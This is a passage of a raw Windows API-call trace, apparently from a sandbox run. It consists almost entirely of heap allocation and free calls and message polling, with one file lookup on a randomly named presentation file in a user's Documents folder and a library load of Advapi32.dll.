RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0220.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0220.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0220.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0220.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0220.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0220.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0220.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0220.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0220.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0220.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0220.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0220.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0220.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0220.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0220.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0220.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0220.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0220.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0220.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0220.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0220.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0220.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0220.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0220.115] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0220.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0220.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0220.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0220.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0220.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0220.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0220.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0220.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0220.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0220.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0220.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0220.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0220.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0220.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0220.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0220.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0220.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0220.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0220.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0220.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0220.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0220.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0220.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0220.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0220.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0220.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0220.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0220.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0220.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0220.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0220.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0220.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0220.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0220.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0220.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0220.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0220.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0220.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0220.116] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0220.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0220.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0220.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0220.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0220.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0220.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0220.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0220.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0220.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0220.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0220.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0220.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0220.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0220.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0220.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0220.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0220.117] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0220.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0220.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0220.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0220.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0220.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0220.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0220.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0220.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0220.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0220.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0220.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0220.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0220.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0220.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0220.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0220.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0220.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0220.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0220.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0220.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0220.118] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/qf_lD4ykVY6P7.pptx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9d6fa90, ftCreationTime.dwHighDateTime=0x1d59068, ftLastAccessTime.dwLowDateTime=0xb8a31ad0, ftLastAccessTime.dwHighDateTime=0x1d5b4cd, ftLastWriteTime.dwLowDateTime=0xb8a31ad0, ftLastWriteTime.dwHighDateTime=0x1d5b4cd, nFileSizeHigh=0x0, nFileSizeLow=0x17685, dwReserved0=0x0, dwReserved1=0x0, cFileName="qf_lD4ykVY6P7.pptx", cAlternateFileName="QF_LD4~1.PPT")) returned 0x9e1d38 [0220.118] FindClose (in: hFindFile=0x9e1d38 | out: hFindFile=0x9e1d38) returned 1 [0220.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0220.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0220.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0220.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0220.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0220.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0220.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0220.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0220.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0220.118] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0220.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0220.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0220.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0220.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0220.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0220.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0220.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0220.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0220.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0220.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0220.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0220.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0220.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0220.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0220.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0220.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0220.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0220.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0220.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0220.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0220.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0220.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0220.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0220.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0220.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0220.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0220.120] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.120] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0220.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0220.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0220.120] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0220.120] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0220.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0220.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0220.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0220.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0220.120] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0220.120] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.120] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0220.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0220.120] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0220.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0220.120] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0220.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0220.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0220.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0220.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0220.121] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0220.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0220.121] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0220.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0220.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0220.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0220.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0220.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0220.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0220.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0220.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0220.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0220.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0220.121] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0220.121] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0220.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0220.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0220.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0220.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0220.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0220.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0220.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0220.122] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0220.122] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.122] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0220.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0220.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | 